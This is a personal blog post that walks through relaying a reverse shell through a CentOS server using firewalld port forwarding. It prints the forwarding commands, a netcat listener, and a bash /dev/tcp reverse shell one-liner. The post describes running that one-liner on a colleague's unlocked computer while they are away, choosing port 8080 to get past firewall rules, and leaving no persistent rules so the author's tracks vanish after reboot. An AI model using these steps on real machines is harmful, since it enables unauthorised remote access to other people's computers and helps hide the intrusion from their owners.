Lance Grover

Lance Grover

Port Forwarding with FirewallD for a Reverse Shell

Posted date:


As an “Ethical Hacker” I find it necessary at times to perform port forwarding, for many reasons…  But I usually just use iptable rules to do that, and then there came firewallD….

FirewallD still uses iptables so my old rules still work, but I also wanted a way to perform port forwarding using the FirewallD process… it also makes my rules just fit in nicely with the rules that are on most Linux systems using firewallD.  Lets take for example a RedHat or CentOS system, say a ver7 or something, and I want to use it as a traffic proxy of sorts so when my reverse shell connects it looks like it is connecting to this server when in reality it is just using this iptables/firewallD port forwarding to send the traffic to my box.  We will call the location of my reverse shell the Client, we will call the RedHat/CentOS system as the Server, and we will call my box the Hacker.

Client 192.168.0.5
Server 192.168.0.1
Hacker 192.168.0.13

First I connect to the Server and we need to setup the firewallD and allow traffic forwarding in the kernel.

  • echo “1” > /proc/sys/net/ipv4/ip_forward
  • firewall-cmd –zone=public –add-masquerade
  • firewall-cmd –zone=public –add-forward-port=port=8080:proto=tcp:toport=8080:toaddr=192.168.0.13

Keep in mind that I did not run these commands again with the “–permanent” parameter since I want my tracks to disappear after a reboot.  If you want them to be permanent then run the same firewall-cmd commands again with the “–permanent” parameter.  If you want to keep the kernal forwarding enabled after a reboot you need to add it to the sysctl.conf or in the /etc/systctl.d/ directory in a file containing this: net.ipv4.ip_forward = 1

After I run these commands, any connection on port 8080 on the Server will be forwarded to the Hacker on port 8080.  I choose port 8080 as it is a common web port and many organizations would have allow rules for it.

Now on the Hacker I need to setup my listener for when I do the reverse shell, I plan to do a simple reverse shell in this example, so there will be no encryption but it also means I won’t have to install anything special on the Client as long as it is a Linux OS.  So I just setup a simple netcat listener on port 8080 in a terminal, this is also the terminal that the reverse shell will connect to so I need to keep this terminal available to me, maybe I run it in a screen session so I don’t loose it and can reconnect to it if I have to leave my box.

  • nc -l 8080

Now we wait for the Client to go to the bathroom, or a meeting, when they have forgot to lock their screen… we open a terminal, perhaps I run this in screen also so I can close the terminal window?  and we run this reverse shell command.

  • bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

This little simple beauty will force the Client to pass a bash shell to the Server on port 8080 which will in turn pass that connection to the Hacker on port 8080.  And in the terminal window where we have ran the netcat….boom a shell prompt!